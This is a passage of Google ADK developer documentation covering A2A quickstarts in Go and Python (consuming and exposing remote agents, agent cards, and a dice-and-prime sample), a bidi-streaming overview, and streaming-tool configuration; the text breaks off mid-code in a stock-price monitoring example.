Consuming a remote agent via A2A Supported in ADKGoExperimental This quickstart covers the most common starting point for any developer: **"There is a remote agent, how do I let my ADK agent use it via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates the **Agent-to-Agent (A2A)** architecture in the Agent Development Kit (ADK), showcasing how multiple agents can work together to handle complex tasks. The sample implements an agent that can roll dice and check if numbers are prime. ```text ┌─────────────────┐ ┌──────────────────┐ ┌────────────────────┐ │ Root Agent │───▶│ Roll Agent │ │ Remote Prime │ │ (Local) │ │ (Local) │ │ Agent │ │ │ │ │ │ (localhost:8001) │ │ │───▶│ │◀───│ │ └─────────────────┘ └──────────────────┘ └────────────────────┘ ``` The A2A Basic sample consists of: - **Root Agent** (`root_agent`): The main orchestrator that delegates tasks to specialized sub-agents - **Roll Agent** (`roll_agent`): A local sub-agent that handles dice rolling operations - **Prime Agent** (`prime_agent`): A remote A2A agent that checks if numbers are prime, this agent is running on a separate A2A server ## Exposing Your Agent with the ADK Server In the `a2a_basic` example, you will first need to expose the `check_prime_agent` via an A2A server, so that the local root agent can use it. ### 1. Getting the Sample Code First, make sure you have Go installed and your environment is set up. You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-docs/tree/main/examples/go/a2a_basic) here: ```bash cd examples/go/a2a_basic ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ └── main.go ├── go.mod ├── go.sum └── main.go # local root agent ``` #### Main Agent (`a2a_basic/main.go`) - **`rollDieTool`**: Function tool for rolling dice - **`newRollAgent`**: Local agent specialized in dice rolling - **`newPrimeAgent`**: Remote A2A agent configuration - **`newRootAgent`**: Main orchestrator with delegation logic #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/main.go`) - **`checkPrimeTool`**: Prime number checking algorithm - **`main`**: Implementation of the prime checking service and A2A server. ### 2. Start the Remote Prime Agent server To show how your ADK agent can consume a remote agent via A2A, you'll first need to start a remote agent server, which will host the prime agent (under `check_prime_agent`). ```bash # Start the remote a2a server that serves the check_prime_agent on port 8001 go run remote_a2a/check_prime_agent/main.go ``` Once executed, you should see something like: ```shell 2025/11/06 11:00:19 Starting A2A prime checker server on port 8001 2025/11/06 11:00:19 Starting the web server: &{port:8001} 2025/11/06 11:00:19 2025/11/06 11:00:19 Web servers starts on http://localhost:8001 2025/11/06 11:00:19 a2a: you can access A2A using jsonrpc protocol: http://localhost:8001 ``` ### 3. Look out for the required agent card of the remote agent A2A Protocol requires that each agent must have an agent card that describes what it does. In the Go ADK, the agent card is generated dynamically when you expose an agent using the A2A launcher. You can visit `http://localhost:8001/.well-known/agent-card.json` to see the generated card. ### 4. Run the Main (Consuming) Agent ```bash # In a separate terminal, run the main agent go run main.go ``` #### How it works The main agent uses `remoteagent.New` to consume the remote agent (`prime_agent` in our example). As you can see below, it requires the `Name`, `Description`, and the `AgentCardSource` URL. a2a_basic/main.go ```go func newPrimeAgent() (agent.Agent, error) { remoteAgent, err := remoteagent.NewA2A(remoteagent.A2AConfig{ Name: "prime_agent", Description: "Agent that handles checking if numbers are prime.", AgentCardSource: "http://localhost:8001", }) if err != nil { return nil, fmt.Errorf("failed to create remote prime agent: %w", err) } return remoteAgent, nil } ``` Then, you can simply use the remote agent in your root agent. In this case, `primeAgent` is used as one of the sub-agents in the `root_agent` below: a2a_basic/main.go ```go func newRootAgent(ctx context.Context, rollAgent, primeAgent agent.Agent) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "root_agent", Model: model, Instruction: ` You are a helpful assistant that can roll dice and check if numbers are prime. You delegate rolling dice tasks to the roll_agent and prime checking tasks to the prime_agent. Follow these steps: 1. If the user asks to roll a die, delegate to the roll_agent. 2. If the user asks to check primes, delegate to the prime_agent. 3. If the user asks to roll a die and then check if the result is prime, call roll_agent first, then pass the result to prime_agent. Always clarify the results before proceeding. `, SubAgents: []agent.Agent{rollAgent, primeAgent}, Tools: []tool.Tool{}, }) } ``` ## Example Interactions Once both your main and remote agents are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent: ```text User: Roll a 6-sided die Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot: I rolled a 6-sided die and the result is 6. ``` **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: Is 7 a prime number? Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[7]] Bot: Yes, 7 is a prime number. ``` **Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent: ```text User: roll a die and check if it's a prime Bot: Okay, I will first roll a die and then check if the result is a prime number. Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[3]] Bot: 3 is a prime number. ``` ## Next Steps Now that you have created an agent that's using a remote agent via an A2A server, the next step is to learn how to expose your own agent. - [**A2A Quickstart (Exposing)**](https://google.github.io/adk-docs/a2a/quickstart-exposing-go/index.md): Learn how to expose your existing agent so that other agents can use it via the A2A Protocol. # Quickstart: Consuming a remote agent via A2A Supported in ADKPythonExperimental This quickstart covers the most common starting point for any developer: **"There is a remote agent, how do I let my ADK agent use it via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates the **Agent2Agent (A2A)** architecture in the Agent Development Kit (ADK), showcasing how multiple agents can work together to handle complex tasks. The sample implements an agent that can roll dice and check if numbers are prime. ```text ┌─────────────────┐ ┌──────────────────┐ ┌────────────────────┐ │ Root Agent │───▶│ Roll Agent │ │ Remote Prime │ │ (Local) │ │ (Local) │ │ Agent │ │ │ │ │ │ (localhost:8001) │ │ │───▶│ │◀───│ │ └─────────────────┘ └──────────────────┘ └────────────────────┘ ``` The A2A Basic sample consists of: - **Root Agent** (`root_agent`): The main orchestrator that delegates tasks to specialized sub-agents - **Roll Agent** (`roll_agent`): A local sub-agent that handles dice rolling operations - **Prime Agent** (`prime_agent`): A remote A2A agent that checks if numbers are prime, this agent is running on a separate A2A server ## Exposing Your Agent with the ADK Server The ADK comes with a built-in CLI command, `adk api_server --a2a` to expose your agent using the A2A protocol. In the `a2a_basic` example, you will first need to expose the `check_prime_agent` via an A2A server, so that the local root agent can use it. ### 1. Getting the Sample Code First, make sure you have the necessary dependencies installed: ```bash pip install google-adk[a2a] ``` You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-python/tree/main/contributing/samples/a2a_basic) here: ```bash git clone https://github.com/google/adk-python.git ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ ├── __init__.py │ ├── agent.json │ └── agent.py ├── README.md ├── __init__.py └── agent.py # local root agent ``` #### Main Agent (`a2a_basic/agent.py`) - **`roll_die(sides: int)`**: Function tool for rolling dice - **`roll_agent`**: Local agent specialized in dice rolling - **`prime_agent`**: Remote A2A agent configuration - **`root_agent`**: Main orchestrator with delegation logic #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/`) - **`agent.py`**: Implementation of the prime checking service - **`agent.json`**: Agent card of the A2A agent - **`check_prime(nums: list[int])`**: Prime number checking algorithm ### 2. Start the Remote Prime Agent server To show how your ADK agent can consume a remote agent via A2A, you'll first need to start a remote agent server, which will host the prime agent (under `check_prime_agent`). ```bash # Start the remote a2a server that serves the check_prime_agent on port 8001 adk api_server --a2a --port 8001 contributing/samples/a2a_basic/remote_a2a ``` Adding logging for debugging with `--log_level debug` To enable debug-level logging, you can add `--log_level debug` to your `adk api_server`, as in: ```bash adk api_server --a2a --port 8001 contributing/samples/a2a_basic/remote_a2a --log_level debug ``` This will give richer logs for you to inspect when testing your agents. Why use port 8001? In this quickstart, when testing locally, your agents will be using localhost, so the `port` for the A2A server for the exposed agent (the remote, prime agent) must be different from the consuming agent's port. The default port for `adk web` where you will interact with the consuming agent is `8000`, which is why the A2A server is created using a separate port, `8001`. Once executed, you should see something like: ```shell INFO: Started server process [56558] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://127.0.0.1:8001 (Press CTRL+C to quit) ``` ### 3. Look out for the required agent card (`agent-card.json`) of the remote agent A2A Protocol requires that each agent must have an agent card that describes what it does. If someone else has already built the remote A2A agent that you are looking to consume in your agent, then you should confirm that they have an agent card (`agent-card.json`). In the sample, the `check_prime_agent` already has an agent card provided: a2a_basic/remote_a2a/check_prime_agent/agent-card.json ```json { "capabilities": {}, "defaultInputModes": ["text/plain"], "defaultOutputModes": ["application/json"], "description": "An agent specialized in checking whether numbers are prime. It can efficiently determine the primality of individual numbers or lists of numbers.", "name": "check_prime_agent", "skills": [ { "id": "prime_checking", "name": "Prime Number Checking", "description": "Check if numbers in a list are prime using efficient mathematical algorithms", "tags": ["mathematical", "computation", "prime", "numbers"] } ], "url": "http://localhost:8001/a2a/check_prime_agent", "version": "1.0.0" } ``` More info on agent cards in ADK In ADK, you can use a `to_a2a(root_agent)` wrapper which automatically generates an agent card for you. If you're interested in learning more about how to expose your existing agent so others can use it, then please look at the [A2A Quickstart (Exposing)](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md) tutorial. ### 4. Run the Main (Consuming) Agent ```bash # In a separate terminal, run the adk web server adk web contributing/samples/ ``` #### How it works The main agent uses the `RemoteA2aAgent()` function to consume the remote agent (`prime_agent` in our example). As you can see below, `RemoteA2aAgent()` requires the `name`, `description`, and the URL of the `agent_card`. a2a_basic/agent.py ```python <...code truncated...> from google.adk.agents.remote_a2a_agent import AGENT_CARD_WELL_KNOWN_PATH from google.adk.agents.remote_a2a_agent import RemoteA2aAgent prime_agent = RemoteA2aAgent( name="prime_agent", description="Agent that handles checking if numbers are prime.", agent_card=( f"http://localhost:8001/a2a/check_prime_agent{AGENT_CARD_WELL_KNOWN_PATH}" ), ) <...code truncated> ``` Then, you can simply use the `RemoteA2aAgent` in your agent. In this case, `prime_agent` is used as one of the sub-agents in the `root_agent` below: a2a_basic/agent.py ```python from google.adk.agents.llm_agent import Agent from google.genai import types root_agent = Agent( model="gemini-2.0-flash", name="root_agent", instruction=""" """, global_instruction=( "You are DicePrimeBot, ready to roll dice and check prime numbers." ), sub_agents=[roll_agent, prime_agent], tools=[example_tool], generate_content_config=types.GenerateContentConfig( safety_settings=[ types.SafetySetting( # avoid false alarm about rolling dice. category=types.HarmCategory.HARM_CATEGORY_DANGEROUS_CONTENT, threshold=types.HarmBlockThreshold.OFF, ), ] ), ) ``` ## Example Interactions Once both your main and remote agents are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent: ```text User: Roll a 6-sided die Bot: I rolled a 4 for you. ``` **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: Is 7 a prime number? Bot: Yes, 7 is a prime number. ``` **Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent: ```text User: Roll a 10-sided die and check if it's prime Bot: I rolled an 8 for you. Bot: 8 is not a prime number. ``` ## Next Steps Now that you have created an agent that's using a remote agent via an A2A server, the next step is to learn how to connect to it from another agent. - [**A2A Quickstart (Exposing)**](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md): Learn how to expose your existing agent so that other agents can use it via the A2A Protocol. # Quickstart: Exposing a remote agent via A2A Supported in ADKGoExperimental This quickstart covers the most common starting point for any developer: **"I have an agent. How do I expose it so that other agents can use my agent via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates how you can easily expose an ADK agent so that it can be then consumed by another agent using the A2A Protocol. In Go, you expose an agent by using the A2A launcher, which dynamically generates an agent card for you. ```text ┌─────────────────┐ ┌───────────────────────────────┐ │ Root Agent │ A2A Protocol │ A2A-Exposed Check Prime Agent │ │ │────────────────────────────▶│ (localhost: 8001) │ └─────────────────┘ └───────────────────────────────┘ ``` The sample consists of : - **Remote Prime Agent** (`remote_a2a/check_prime_agent/main.go`): This is the agent that you want to expose so that other agents can use it via A2A. It is an agent that handles prime number checking. It becomes exposed using the A2A launcher. - **Root Agent** (`main.go`): A simple agent that is just calling the remote prime agent. ## Exposing the Remote Agent with the A2A Launcher You can take an existing agent built using the Go ADK and make it A2A-compatible by using the A2A launcher. ### 1. Getting the Sample Code First, make sure you have Go installed and your environment is set up. You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-docs/tree/main/examples/go/a2a_basic) here: ```bash cd examples/go/a2a_basic ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ └── main.go # Remote Prime Agent ├── go.mod ├── go.sum └── main.go # Root agent ``` #### Root Agent (`a2a_basic/main.go`) - **`newRootAgent`**: A local agent that connects to the remote A2A service. #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/main.go`) - **`checkPrimeTool`**: Function for prime number checking. - **`main`**: The main function that creates the agent and starts the A2A server. ### 2. Start the Remote A2A Agent server You can now start the remote agent server, which will host the `check_prime_agent`: ```bash # Start the remote agent go run remote_a2a/check_prime_agent/main.go ``` Once executed, you should see something like: ```shell 2025/11/06 11:00:19 Starting A2A prime checker server on port 8001 2025/11/06 11:00:19 Starting the web server: &{port:8001} 2025/11/06 11:00:19 2025/11/06 11:00:19 Web servers starts on http://localhost:8001 2025/11/06 11:00:19 a2a: you can access A2A using jsonrpc protocol: http://localhost:8001 ``` ### 3. Check that your remote agent is running You can check that your agent is up and running by visiting the agent card that was auto-generated by the A2A launcher: You should see the contents of the agent card. ### 4. Run the Main (Consuming) Agent Now that your remote agent is running, you can run the main agent. ```bash # In a separate terminal, run the main agent go run main.go ``` #### How it works The remote agent is exposed using the A2A launcher in the `main` function. The launcher takes care of starting the server and generating the agent card. remote_a2a/check_prime_agent/main.go ```go func main() { ctx := context.Background() primeTool, err := functiontool.New(functiontool.Config{ Name: "prime_checking", Description: "Check if numbers in a list are prime using efficient mathematical algorithms", }, checkPrimeTool) if err != nil { log.Fatalf("Failed to create prime_checking tool: %v", err) } model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } primeAgent, err := llmagent.New(llmagent.Config{ Name: "check_prime_agent", Description: "check prime agent that can check whether numbers are prime.", Instruction: ` You check whether numbers are prime. When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. You should never pass in a string. You should not rely on the previous history on prime results. `, Model: model, Tools: []tool.Tool{primeTool}, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create launcher. The a2a.NewLauncher() will dynamically generate the agent card. port := 8001 webLauncher := web.NewLauncher(a2a.NewLauncher()) _, err = webLauncher.Parse([]string{ "--port", strconv.Itoa(port), "a2a", "--a2a_agent_url", "http://localhost:" + strconv.Itoa(port), }) if err != nil { log.Fatalf("launcher.Parse() error = %v", err) } // Create ADK config config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(primeAgent), SessionService: session.InMemoryService(), } log.Printf("Starting A2A prime checker server on port %d\n", port) // Run launcher if err := webLauncher.Run(context.Background(), config); err != nil { log.Fatalf("webLauncher.Run() error = %v", err) } } ``` ## Example Interactions Once both services are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: roll a die and check if it's a prime Bot: Okay, I will first roll a die and then check if the result is a prime number. Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[3]] Bot: 3 is a prime number. ... ``` ## Next Steps Now that you have created an agent that's exposing a remote agent via an A2A server, the next step is to learn how to consume it from another agent. - [**A2A Quickstart (Consuming)**](https://google.github.io/adk-docs/a2a/quickstart-consuming-go/index.md): Learn how your agent can use other agents using the A2A Protocol. # Quickstart: Exposing a remote agent via A2A Supported in ADKPythonExperimental This quickstart covers the most common starting point for any developer: **"I have an agent. How do I expose it so that other agents can use my agent via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates how you can easily expose an ADK agent so that it can be then consumed by another agent using the A2A Protocol. There are two main ways to expose an ADK agent via A2A. - **by using the `to_a2a(root_agent)` function**: use this function if you just want to convert an existing agent to work with A2A, and be able to expose it via a server through `uvicorn`, instead of `adk deploy api_server`. This means that you have tighter control over what you want to expose via `uvicorn` when you want to productionize your agent. Furthermore, the `to_a2a()` function auto-generates an agent card based on your agent code. - **by creating your own agent card (`agent.json`) and hosting it using `adk api_server --a2a`**: There are two main benefits of using this approach. First, `adk api_server --a2a` works with `adk web`, making it easy to use, debug, and test your agent. Second, with `adk api_server`, you can specify a parent folder with multiple, separate agents. Those agents that have an agent card (`agent.json`), will automatically be usable via A2A by other agents through the same server. However, you will need to create your own agent cards. To create an agent card, you can follow the [A2A Python tutorial](https://a2a-protocol.org/latest/tutorials/python/1-introduction/). This quickstart will focus on `to_a2a()`, as it is the easiest way to expose your agent and will also autogenerate the agent card behind-the-scenes. If you'd like to use the `adk api_server` approach, you can see it being used in the [A2A Quickstart (Consuming) documentation](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md). ```text Before: ┌────────────────────┐ │ Hello World Agent │ │ (Python Object) │ | without agent card │ └────────────────────┘ │ │ to_a2a() ▼ After: ┌────────────────┐ ┌───────────────────────────────┐ │ Root Agent │ A2A Protocol │ A2A-Exposed Hello World Agent │ │(RemoteA2aAgent)│────────────────────────────▶│ (localhost: 8001) │ │(localhost:8000)│ └───────────────────────────────┘ └────────────────┘ ``` The sample consists of : - **Remote Hello World Agent** (`remote_a2a/hello_world/agent.py`): This is the agent that you want to expose so that other agents can use it via A2A. It is an agent that handles dice rolling and prime number checking. It becomes exposed using the `to_a2a()` function and is served using `uvicorn`. - **Root Agent** (`agent.py`): A simple agent that is just calling the remote Hello World agent. ## Exposing the Remote Agent with the `to_a2a(root_agent)` function You can take an existing agent built using ADK and make it A2A-compatible by simply wrapping it using the `to_a2a()` function. For example, if you have an agent like the following defined in `root_agent`: ```python # Your agent code here root_agent = Agent( model='gemini-2.0-flash', name='hello_world_agent', <...your agent code...> ) ``` Then you can make it A2A-compatible simply by using `to_a2a(root_agent)`: ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a # Make your agent A2A-compatible a2a_app = to_a2a(root_agent, port=8001) ``` The `to_a2a()` function will even auto-generate an agent card in-memory behind-the-scenes by [extracting skills, capabilities, and metadata from the ADK agent](https://github.com/google/adk-python/blob/main/src/google/adk/a2a/utils/agent_card_builder.py), so that the well-known agent card is made available when the agent endpoint is served using `uvicorn`. You can also provide your own agent card by using the `agent_card` parameter. The value can be an `AgentCard` object or a path to an agent card JSON file. **Example with an `AgentCard` object:** ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a from a2a.types import AgentCard # Define A2A agent card my_agent_card = AgentCard( name="file_agent", url="http://example.com", description="Test agent from file", version="1.0.0", capabilities={}, skills=[], defaultInputModes=["text/plain"], defaultOutputModes=["text/plain"], supportsAuthenticatedExtendedCard=False, ) a2a_app = to_a2a(root_agent, port=8001, agent_card=my_agent_card) ``` **Example with a path to a JSON file:** ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a # Load A2A agent card from a file a2a_app = to_a2a(root_agent, port=8001, agent_card="/path/to/your/agent-card.json") ``` Now let's dive into the sample code. ### 1. Getting the Sample Code First, make sure you have the necessary dependencies installed: ```bash pip install google-adk[a2a] ``` You can clone and navigate to the [**a2a_root** sample](https://github.com/google/adk-python/tree/main/contributing/samples/a2a_root) here: ```bash git clone https://github.com/google/adk-python.git ``` As you'll see, the folder structure is as follows: ```text a2a_root/ ├── remote_a2a/ │ └── hello_world/ │ ├── __init__.py │ └── agent.py # Remote Hello World Agent ├── README.md └── agent.py # Root agent ``` #### Root Agent (`a2a_root/agent.py`) - **`root_agent`**: A `RemoteA2aAgent` that connects to the remote A2A service - **Agent Card URL**: Points to the well-known agent card endpoint on the remote server #### Remote Hello World Agent (`a2a_root/remote_a2a/hello_world/agent.py`) - **`roll_die(sides: int)`**: Function tool for rolling dice with state management - **`check_prime(nums: list[int])`**: Async function for prime number checking - **`root_agent`**: The main agent with comprehensive instructions - **`a2a_app`**: The A2A application created using `to_a2a()` utility ### 2. Start the Remote A2A Agent server You can now start the remote agent server, which will host the `a2a_app` within the hello_world agent: ```bash # Ensure current working directory is adk-python/ # Start the remote agent using uvicorn uvicorn contributing.samples.a2a_root.remote_a2a.hello_world.agent:a2a_app --host localhost --port 8001 ``` Why use port 8001? In this quickstart, when testing locally, your agents will be using localhost, so the `port` for the A2A server for the exposed agent (the remote, prime agent) must be different from the consuming agent's port. The default port for `adk web` where you will interact with the consuming agent is `8000`, which is why the A2A server is created using a separate port, `8001`. Once executed, you should see something like: ```shell INFO: Started server process [10615] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://localhost:8001 (Press CTRL+C to quit) ``` ### 3. Check that your remote agent is running You can check that your agent is up and running by visiting the agent card that was auto-generated earlier as part of your `to_a2a()` function in `a2a_root/remote_a2a/hello_world/agent.py`: You should see the contents of the agent card, which should look like: ```json {"capabilities":{},"defaultInputModes":["text/plain"],"defaultOutputModes":["text/plain"],"description":"hello world agent that can roll a dice of 8 sides and check prime numbers.","name":"hello_world_agent","protocolVersion":"0.2.6","skills":[{"description":"hello world agent that can roll a dice of 8 sides and check prime numbers. \n I roll dice and answer questions about the outcome of the dice rolls.\n I can roll dice of different sizes.\n I can use multiple tools in parallel by calling functions in parallel(in one request and in one round).\n It is ok to discuss previous dice roles, and comment on the dice rolls.\n When I are asked to roll a die, I must call the roll_die tool with the number of sides. Be sure to pass in an integer. Do not pass in a string.\n I should never roll a die on my own.\n When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. I should never pass in a string.\n I should not check prime numbers before calling the tool.\n When I are asked to roll a die and check prime numbers, I should always make the following two function calls:\n 1. I should first call the roll_die tool to get a roll. Wait for the function response before calling the check_prime tool.\n 2. After I get the function response from roll_die tool, I should call the check_prime tool with the roll_die result.\n 2.1 If user asks I to check primes based on previous rolls, make sure I include the previous rolls in the list.\n 3. When I respond, I must include the roll_die result from step 1.\n I should always perform the previous 3 steps when asking for a roll and checking prime numbers.\n I should not rely on the previous history on prime results.\n ","id":"hello_world_agent","name":"model","tags":["llm"]},{"description":"Roll a die and return the rolled result.\n\nArgs:\n sides: The integer number of sides the die has.\n tool_context: the tool context\nReturns:\n An integer of the result of rolling the die.","id":"hello_world_agent-roll_die","name":"roll_die","tags":["llm","tools"]},{"description":"Check if a given list of numbers are prime.\n\nArgs:\n nums: The list of numbers to check.\n\nReturns:\n A str indicating which number is prime.","id":"hello_world_agent-check_prime","name":"check_prime","tags":["llm","tools"]}],"supportsAuthenticatedExtendedCard":false,"url":"http://localhost:8001","version":"0.0.1"} ``` ### 4. Run the Main (Consuming) Agent Now that your remote agent is running, you can launch the dev UI and select "a2a_root" as your agent. ```bash # In a separate terminal, run the adk web server adk web contributing/samples/ ``` To open the adk web server, go to: . ## Example Interactions Once both services are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent: ```text User: Roll a 6-sided die Bot: I rolled a 4 for you. ``` **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: Is 7 a prime number? Bot: Yes, 7 is a prime number. ``` **Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent: ```text User: Roll a 10-sided die and check if it's prime Bot: I rolled an 8 for you. Bot: 8 is not a prime number. ``` ## Next Steps Now that you have created an agent that's exposing a remote agent via an A2A server, the next step is to learn how to consume it from another agent. - [**A2A Quickstart (Consuming)**](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md): Learn how your agent can use other agents using the A2A Protocol. # Bidi-streaming (live) in ADK Supported in ADKPython v0.5.0Experimental Bidirectional (Bidi) streaming (live) in ADK adds the low-latency bidirectional voice and video interaction capability of [Gemini Live API](https://ai.google.dev/gemini-api/docs/live) to AI agents. With bidi-streaming, or live, mode, you can provide end users with the experience of natural, human-like voice conversations, including the ability for the user to interrupt the agent's responses with voice commands. Agents with streaming can process text, audio, and video inputs, and they can provide text and audio output. - **Quickstart (Bidi-streaming)** ______________________________________________________________________ In this quickstart, you'll build a simple agent and use streaming in ADK to implement low-latency and bidirectional voice and video communication. - [Quickstart (Bidi-streaming)](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/index.md) - **Bidi-streaming Demo Application** ______________________________________________________________________ A production-ready reference implementation showcasing ADK bidirectional streaming with multimodal support (text, audio, image). This FastAPI-based demo demonstrates real-time WebSocket communication, automatic transcription, tool calling with Google Search, and complete streaming lifecycle management. This demo is extensively referenced throughout the development guide series. - [ADK Bidi-streaming Demo](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo) - **Blog post: ADK Bidi-streaming Visual Guide** ______________________________________________________________________ A visual guide to real-time multimodal AI agent development with ADK Bidi-streaming. This article provides intuitive diagrams and illustrations to help you understand how Bidi-streaming works and how to build interactive AI agents. - [Blog post: ADK Bidi-streaming Visual Guide](https://medium.com/google-cloud/adk-bidi-streaming-a-visual-guide-to-real-time-multimodal-ai-agent-development-62dd08c81399) - **Bidi-streaming development guide series** ______________________________________________________________________ A series of articles for diving deeper into the Bidi-streaming development with ADK. You can learn basic concepts and use cases, the core API, and end-to-end application design. - [Part 1: Introduction to ADK Bidi-streaming](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) - Fundamentals of Bidi-streaming, Live API technology, ADK architecture components, and complete application lifecycle with FastAPI examples - [Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) - Upstream message flow, sending text/audio/video, activity signals, and concurrency patterns - [Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) - Processing events, handling text/audio/transcriptions, automatic tool execution, and multi-agent workflows - [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) - Response modalities, streaming modes, session management, session resumption, context window compression, and quota management - [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md) - Audio specifications, model architectures, audio transcription, voice activity detection, and proactive/affective dialog features - **Streaming Tools** ______________________________________________________________________ Streaming tools allow tools (functions) to stream intermediate results back to agents and agents can respond to those intermediate results. For example, we can use streaming tools to monitor the changes of the stock price and have the agent react to it. Another example is we can have the agent monitor the video stream, and when there are changes in video stream, the agent can report the changes. - [Streaming Tools](https://google.github.io/adk-docs/streaming/streaming-tools/index.md) - **Blog post: Google ADK + Vertex AI Live API** ______________________________________________________________________ This article shows how to use Bidi-streaming (live) in ADK for real-time audio/video streaming. It offers a Python server example using LiveRequestQueue to build custom, interactive AI agents. - [Blog post: Google ADK + Vertex AI Live API](https://medium.com/google-cloud/google-adk-vertex-ai-live-api-125238982d5e) - **Blog post: Supercharge ADK Development with Claude Code Skills** ______________________________________________________________________ This article demonstrates how to use Claude Code Skills to accelerate ADK development, with an example of building a Bidi-streaming chat app. Learn how to leverage AI-powered coding assistance to build better agents faster. - [Blog post: Supercharge ADK Development with Claude Code Skills](https://medium.com/@kazunori279/supercharge-adk-development-with-claude-code-skills-d192481cbe72) # Configuring streaming behaviour Supported in ADKPython v0.5.0Experimental There are some configurations you can set for live(streaming) agents. It's set by [RunConfig](https://github.com/google/adk-python/blob/main/src/google/adk/agents/run_config.py). You should use RunConfig with your [Runner.run_live(...)](https://github.com/google/adk-python/blob/main/src/google/adk/runners.py). For example, if you want to set voice config, you can leverage speech_config. ```python voice_config = genai_types.VoiceConfig( prebuilt_voice_config=genai_types.PrebuiltVoiceConfigDict( voice_name='Aoede' ) ) speech_config = genai_types.SpeechConfig(voice_config=voice_config) run_config = RunConfig(speech_config=speech_config) runner.run_live( ..., run_config=run_config, ) ``` # Streaming Tools Supported in ADKPython v0.5.0Experimental Streaming tools allows tools(functions) to stream intermediate results back to agents and agents can respond to those intermediate results. For example, we can use streaming tools to monitor the changes of the stock price and have the agent react to it. Another example is we can have the agent monitor the video stream, and when there is changes in video stream, the agent can report the changes. Info This is only supported in streaming(live) agents/api. To define a streaming tool, you must adhere to the following: 1. **Asynchronous Function:** The tool must be an `async` Python function. 1. **AsyncGenerator Return Type:** The function must be typed to return an `AsyncGenerator`. The first type parameter to `AsyncGenerator` is the type of the data you `yield` (e.g., `str` for text messages, or a custom object for structured data). The second type parameter is typically `None` if the generator doesn't receive values via `send()`. We support two types of streaming tools: - Simple type. This is a one type of streaming tools that only take non-video/-audio streams(the streams that you feed to adk web or adk runner) as input. - Video streaming tools. This only works in video streaming and the video stream(the streams that you feed to adk web or adk runner) will be passed into this function. Now let's define an agent that can monitor stock price changes and monitor the video stream changes. ```python import asyncio from typing import AsyncGenerator from google.adk.agents import LiveRequestQueue from google.adk.agents.llm_agent import Agent from google.adk.tools.function_tool import FunctionTool from google.genai import Client from google.genai import types as genai_types async def monitor_stock_price(stock_symbol: str) -> AsyncGenerator[str, None]: """This function will monitor the price for the given stock_symbol in a continuous, streaming and asynchronously way.""" print(f"Start monitor stock price for {stock_symbol}!") # Let's mock stock price change. await asyncio.sleep(4) price_alert1 = f"the price for {stock_symbol} is 300" yield price_alert1 print(price_alert1) await asyncio.sleep(4) price_alert1 = f"the price for {stock_symbol} is 400" 